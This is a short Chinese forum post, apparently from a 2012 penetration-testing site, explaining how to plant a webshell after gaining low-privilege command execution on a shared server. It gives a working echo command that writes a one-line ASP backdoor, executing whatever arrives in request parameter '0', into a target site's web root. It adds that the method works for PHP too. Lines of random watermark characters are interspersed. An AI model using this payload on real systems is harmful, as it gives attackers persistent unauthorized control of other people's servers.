中国网络渗透测试联盟
标题:
旁注cmd低权限下拿webshell
[打印本页]
作者:
admin
时间:
2012-9-23 14:40
标题:
旁注cmd低权限下拿webshell
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
/ ~2 ~3 C" }0 `! h; @ c1 k5 d
! ^/ T4 Z4 g' l# j$ I" K' G: p
命令格式
5 ^$ M% q1 T. k! x+ R
) i! h( T4 Q4 y
Echo 语句 >目标站绝对目录
7 {& Q) r2 n- E# U. L# ^0 }
9 Q2 C9 F9 }/ {8 m* o# ]3 C
例如:
7 r6 x1 m' M' R& e4 I
* ^7 F7 G6 V/ W! @
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
4 G+ k8 [$ X2 Z
. B7 @! X. b# C( F5 z
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
" ?0 }0 r4 T) U/ Z _
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2